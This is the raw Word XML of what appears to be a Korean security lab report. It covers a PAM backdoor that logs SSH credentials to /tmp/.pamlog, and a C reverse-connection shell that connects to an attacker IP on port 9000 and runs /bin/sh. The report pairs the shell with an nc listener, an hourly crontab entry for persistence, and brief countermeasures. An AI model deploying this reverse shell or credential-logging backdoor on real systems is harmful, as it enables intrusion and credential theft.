    <w:p w14:paraId="64EC30BF" w14:textId="2E98841B" w:rsidR="002E4430" w:rsidRDefault="002B4D4C"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AA63F2D" wp14:editId="67CDEB63">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-66675</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>-205105</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6772275" cy="9734550"/>
                <wp:effectExtent l="0" t="0" r="9525" b="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8012" id="직사각형 14" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-5.25pt;margin-top:-16.15pt;width:533.25pt;height:766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Eb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u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 w:rsidR="008C29A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일 동작 확인</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2F126E" w14:textId="0B7C9E1E" w:rsidR="008C29A8" w:rsidRDefault="008C29A8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1327D43D" wp14:editId="7A05ED8A">
            <wp:extent cx="5553075" cy="2371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7E4" w14:textId="35DD2088" w:rsidR="008C29A8" w:rsidRDefault="008C29A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">원격 터미널에서 정상적인 사용자가 로그인을 하는 것을 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>확인 후 작업 취소(</w:t>
      </w:r>
      <w:r>
        <w:t>ctrl + C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A705A1" w14:textId="0A2A07DB" w:rsidR="008C29A8" w:rsidRDefault="008C29A8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="097C13A3" wp14:editId="77D43EAD">
            <wp:extent cx="6645910" cy="9925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7726" w14:textId="03E8C06C" w:rsidR="008C29A8" w:rsidRDefault="008C29A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">내부적으로 </w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pamlog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일에 계정 정보를 저장하는 것을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132AB1C6" w14:textId="007BA671" w:rsidR="008C29A8" w:rsidRDefault="008C29A8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E71631B" wp14:editId="2EF3ABB9">
            <wp:extent cx="4181475" cy="5334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E045" w14:textId="247BD4E4" w:rsidR="008C29A8" w:rsidRDefault="008C29A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>확인해보면 모든 계정</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>정보가 저장되는 것을 알 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D48E800" w14:textId="30F90E5C" w:rsidR="00934413" w:rsidRPr="008C29A8" w:rsidRDefault="008C29A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이를 예방하기 위해 </w:t>
      </w:r>
      <w:r w:rsidRPr="008C29A8">
        <w:t>SSH 백도어를 조기에 탐지·대응하기 위해서는 시스템 파일에 대한 무결성을 주기적으로 검사하도록 감사 정책을 마련하고, 지속적인 모니터링을 수행할 필요가 있다. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B260A3" w14:textId="77CDC91C" w:rsidR="00ED11CF" w:rsidRDefault="00ED11CF"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6830B9" w14:paraId="4B3CF889" w14:textId="77777777" w:rsidTr="006830B9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14062819" w14:textId="57B8B2DB" w:rsidR="006830B9" w:rsidRPr="006830B9" w:rsidRDefault="00836B5D" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:ind w:leftChars="0" w:left="0"/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lastRenderedPageBreak/>
              <w:br w:type="page"/>
            </w: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DEE63DC" wp14:editId="2D79AC4A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52" name="직사각형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206F" id="직사각형 52" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:.35pt;width:533.25pt;height:766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AJswIAAK0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6)</w:t>
            </w:r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 xml:space="preserve">Remote </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>백도어</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="006830B9" w:rsidRPr="006830B9">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Reverse Connection Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006830B9" w14:paraId="07F4AF1B" w14:textId="77777777" w:rsidTr="006830B9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</w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0259FDFF" w14:textId="77777777" w:rsidR="006830B9" w:rsidRPr="006830B9" w:rsidRDefault="006830B9" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/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-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netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5171E339" w14:textId="77777777" w:rsidR="006830B9" w:rsidRPr="006830B9" w:rsidRDefault="006830B9" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/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- 공격대상 호스트가 사설네트워크로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묶여있어서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직접적인 접근이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어려울때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사용</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1926D568" w14:textId="77777777" w:rsidR="006830B9" w:rsidRPr="006830B9" w:rsidRDefault="006830B9" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/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- 주로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cron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데몬과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함께 공격</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D17751C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22C6B4B3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A7D8B48" w14:textId="77777777" w:rsid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일반 유저 계정에서 vim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rev_s.c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작성</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="645B6F38" w14:textId="1C206C60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gedit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rev_s.c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006830B9" w14:paraId="285D4DF4" w14:textId="77777777" w:rsidTr="006830B9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279DBF44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sys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ocket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69BF56C3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netinet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in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6C70667B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rpa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inet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2F186F40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netdb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5770B9B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unistd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1A92C9E0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#include &lt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errno.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0C576906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064CC12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main(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int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rgc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, char*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rgv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[])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F58D8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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38445136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struct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ockaddr_in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2FEC492E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int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16C024E8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int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client_len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64549EC9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char </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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buf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80];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D5C824D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char </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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rbuf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80];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00FF926D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char *</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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cmd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2] = {"/bin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", (char *)0};</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67A119E4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A6B25C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ab/>
              <w:t>//통신을 위한 설정(소켓 생성 및 주소 설정)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B963D4E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socket(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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AF_INET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OCK_STREAM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, 6);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DBAC1A2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.sin_family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AF_INET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00A35E10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inet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- 통신하고자 하는 서버의 IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="165C492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.sin_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addr.s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inet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"192.168.0.170"); //공격자 PC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D703A7B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//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htons</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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- 서버의 port번호</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0580850C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.sin_port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htons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atoi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"9000"));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E7CDF13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clinet_len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izeof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07869AD9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1EF1A1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ab/>
              <w:t>/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tcp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연결, 3-way 실행</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CCA064E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connect(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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, (struct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ock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*)&amp;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addr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clinet_len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4D60BF84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3A01B59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// 표준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입력,출력,에러의 방향을 연결된 네트워크 세션으로 전달</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0045EA7F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dup2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, 0);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1541B05A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dup2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, 1);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1417389A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dup2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erver_sock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, 2);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59E32DDD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B6352FA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ab/>
            </w:r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// 연결된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네트워크 세션으로 통신할 프로그램을 실행 - 쉘을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0번(root) 권한으로 실행함</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C732F1E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6830B9">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>execve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6830B9">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>"/bin/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sh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", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006830B9">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006830B9">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>, 0);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59E353C2" w14:textId="77777777" w:rsidR="006830B9" w:rsidRPr="006830B9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 xml:space="preserve">        return 0;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C0F0C72" w14:textId="01112CB8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830B9">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006830B9" w14:paraId="540983F9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CCE31F1" w14:textId="0DBF9B85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1. 공격 서버(칼리)측은 접속대기(listen)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E8449A2" w14:textId="0D5EED3B" w:rsidR="006830B9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nc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-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lvp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9000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006830B9" w14:paraId="2D042F0D" w14:textId="77777777" w:rsidTr="00836B5D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0C18C32C" w14:textId="77777777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1DC43728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89498C4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2. 공격대상 호스트에서 리버스 커넥션 쉘을 실행함</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77B5A0C5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DE5924A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836B5D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gcc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-o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.c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3B29E9F0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836B5D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ll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|grep rev</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="520079D9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lastRenderedPageBreak/>
              <w:t>-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wxrwxr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-x. 1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8672 12월 15 15:53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</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="774F559E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w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w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-r--. 1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1214 12월 15 15:53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.c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="148DC4D1" w14:textId="39947BCB" w:rsidR="006830B9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836B5D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./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</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006830B9" w14:paraId="78CE6C87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DDF4106" w14:textId="77777777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836B5D" w14:paraId="15C6A80A" w14:textId="77777777" w:rsidTr="00836B5D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63E65137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3538A5FC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22265FDF" w14:textId="3EFFA2CA" w:rsidR="006830B9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3. 공격자 &lt;--&gt; 공격대상 연결됨</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006830B9" w14:paraId="34487276" w14:textId="77777777" w:rsidTr="00836B5D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59448252" w14:textId="5438B28A" w:rsidR="006830B9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E263845" wp14:editId="3B496444">
                  <wp:extent cx="4724400" cy="1247775"/>
                  <wp:effectExtent l="0" t="0" r="0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0B9" w14:paraId="105BEAE4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B876F38" w14:textId="47F0CB89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 w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>•</w:t>
            </w:r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crond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백도어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(타겟 서버에서 등록)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A5BD735" w14:textId="55C27C47" w:rsidR="006830B9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- 매시간마다 공격자 측에 접속하게 설정</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006830B9" w14:paraId="3C5E66B8" w14:textId="77777777" w:rsidTr="00836B5D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80EA02C" w14:textId="77777777" w:rsidR="00836B5D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@CS7-166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836B5D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>~]$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00836B5D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>/crontab -e</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="314EF01D" w14:textId="6423AEAB" w:rsidR="006830B9" w:rsidRPr="00836B5D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6B5D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>0 * * * * /home/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user0</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00836B5D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836B5D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>rev_s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006830B9" w14:paraId="154A533D" w14:textId="77777777" w:rsidTr="00ED11CF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2C24A7E9" w14:textId="77777777" w:rsidR="006830B9" w:rsidRPr="007950B5" w:rsidRDefault="006830B9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830B9" w14:paraId="3566B074" w14:textId="77777777" w:rsidTr="006830B9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F680A79" w14:textId="6AD0ED95" w:rsidR="006830B9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대책방안</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006830B9" w:rsidRPr="00836B5D" w14:paraId="7F970CD1" w14:textId="77777777" w:rsidTr="00836B5D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1400DAA0" w14:textId="61E16CB7" w:rsidR="006830B9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불필요한 계정의 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>crontab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시스템 명령)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허용하지 않</w:t>
            </w:r>
            <w:r w:rsidR="00CF7789">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>는다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F8C2C94" w14:textId="071E9F6D" w:rsidR="00836B5D" w:rsidRPr="007950B5" w:rsidRDefault="00836B5D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gcc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>의 실행권한을 특정 유저 혹은 그룹만 사용할 수 있도록 제한</w:t>
            </w:r>
            <w:r w:rsidR="00CF7789">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>한다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03A53594" w14:textId="4A1CD8CC" w:rsidR="0016436D" w:rsidRDefault="00BE7966" w:rsidP="00836B5D">
      <w:pPr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B5DCD4" wp14:editId="32B977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772275" cy="9734550"/>
                <wp:effectExtent l="0" t="0" r="9525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B97C" id="직사각형 23" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:533.25pt;height:766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lU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U6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M6f+VS0AgAArQUAAA4A&#10;AAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhALZdKajbAAAABwEA&#10;AA8AAAAAAAAAAAAAAAAADgUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAWBgAAAAA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699E" w14:textId="77777777" w:rsidR="00D25E3C" w:rsidRDefault="00D25E3C" w:rsidP="000D6EBD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="26531682" w14:textId="77777777" w:rsidR="00D25E3C" w:rsidRDefault="00D25E3C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623E" w14:textId="77777777" w:rsidR="00D25E3C" w:rsidRDefault="00D25E3C" w:rsidP="000D6EBD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2CCBB825" w14:textId="77777777" w:rsidR="00D25E3C" w:rsidRDefault="00D25E3C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9ECE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59687A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE487BEC"/>
    <w:lvl w:ilvl="0" w:tplc="0C2C707C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsia="D2Coding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1F0AE3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A3504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A34AA6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="258846D4"/>
    <w:lvl w:ilvl="0" w:tplc="4E06B9CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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691B0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D966C546"/>
    <w:lvl w:ilvl="0" w:tplc="1E3E75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7428A8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FD1F5A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CCC405BE"/>
    <w:lvl w:ilvl="0" w:tplc="778A6A4A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42630EE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F47824DC"/>
    <w:lvl w:ilvl="0" w:tplc="00B43A5A">
      <w:start w:val="6"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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72DF7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="534CE432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5D227E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9D7025"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="89585578"/>
    <w:lvl w:ilvl="0" w:tplc="68FE526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1E26080"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA44E03C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C6D28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A4A858C4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FE259B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0973BF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="875EC926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4"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="21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9"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="2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4BC1"/>
    <w:rsid w:val="00025C1B"/>
    <w:rsid w:val="0004419D"/>
    <w:rsid w:val="00065EEB"/>
    <w:rsid w:val="000A6A41"/>
    <w:rsid w:val="000D511C"/>
    <w:rsid w:val="000D6EBD"/>
    <w:rsid w:val="001072CD"/>
    <w:rsid w:val="00135ACB"/>
    <w:rsid w:val="0016436D"/>
    <w:rsid w:val="001C4D99"/>
    <w:rsid w:val="001E0EEF"/>
    <w:rsid w:val="001F0BA1"/>
    <w:rsid w:val="001F4962"/>
    <w:rsid w:val="002044FF"/>
    <w:rsid w:val="002631E4"/>
    <w:rsid w:val="002761E0"/>
    <w:rsid w:val="0028607F"/>
    <w:rsid w:val="002B4D4C"/>
    <w:rsid w:val="002D5F30"/>
    <w:rsid w:val="002E4430"/>
    <w:rsid w:val="00304459"/>
    <w:rsid w:val="00342D72"/>
    <w:rsid w:val="0037104B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830B9"/>
    <w:rsid w:val="00707ECA"/>
    <w:rsid w:val="00723DD9"/>
    <w:rsid w:val="00730FAC"/>
    <w:rsid w:val="00747A65"/>
    <w:rsid w:val="0077795D"/>
    <w:rsid w:val="007950B5"/>
    <w:rsid w:val="0079744A"/>
    <w:rsid w:val="007C11B9"/>
    <w:rsid w:val="007D4199"/>
    <w:rsid w:val="007F2AA2"/>
    <w:rsid w:val="007F6510"/>
    <w:rsid w:val="00810D7F"/>
    <w:rsid w:val="008335CD"/>
    <w:rsid w:val="00836B5D"/>
    <w:rsid w:val="00860EA6"/>
    <w:rsid w:val="0086277C"/>
    <w:rsid w:val="00881308"/>
    <w:rsid w:val="00891F73"/>
    <w:rsid w:val="008B2F50"/>
    <w:rsid w:val="008C29A8"/>
    <w:rsid w:val="008E68CE"/>
    <w:rsid w:val="00934413"/>
    <w:rsid w:val="00943F7D"/>
    <w:rsid w:val="00952E43"/>
    <w:rsid w:val="00977B7F"/>
    <w:rsid w:val="009F50D9"/>
    <w:rsid w:val="00A21FC0"/>
    <w:rsid w:val="00A51ABA"/>
    <w:rsid w:val="00A906F7"/>
    <w:rsid w:val="00AA7CC6"/>
    <w:rsid w:val="00B011A0"/>
    <w:rsid w:val="00B60A60"/>
    <w:rsid w:val="00B67587"/>
    <w:rsid w:val="00B75F57"/>
    <w:rsid w:val="00B7649D"/>
    <w:rsid w:val="00BE7966"/>
    <w:rsid w:val="00BF24B9"/>
    <w:rsid w:val="00C40388"/>
    <w:rsid w:val="00C526C5"/>
    <w:rsid w:val="00C61ABA"/>
    <w:rsid w:val="00C75C0A"/>
    <w:rsid w:val="00CA235D"/>
    <w:rsid w:val="00CD5594"/>
    <w:rsid w:val="00CD7C05"/>
    <w:rsid w:val="00CF7789"/>
    <w:rsid w:val="00D1788F"/>
    <w:rsid w:val="00D25E3C"/>
    <w:rsid w:val="00D34610"/>
    <w:rsid w:val="00D77909"/>
    <w:rsid w:val="00D83289"/>
    <w:rsid w:val="00DA2AA2"/>
    <w:rsid w:val="00DB7022"/>
    <w:rsid w:val="00DE047E"/>
    <w:rsid w:val="00EA025D"/>
    <w:rsid w:val="00ED11CF"/>
    <w:rsid w:val="00F21CD1"/>
    <w:rsid w:val="00F413DD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11CF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E68CE"/>
    <w:pPr>
      <w:ind w:leftChars="400" w:left="800"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="header"/>
    <w:basedOn w:val="a0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0D6EBD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a0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0D6EBD"/>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="004D094A"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C4D99"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="12"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002E443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inux-pam.org/library/Linux-PAM-1.1.8.tar.gz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Lee Jaeyoung</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-17T04:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-17T06:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>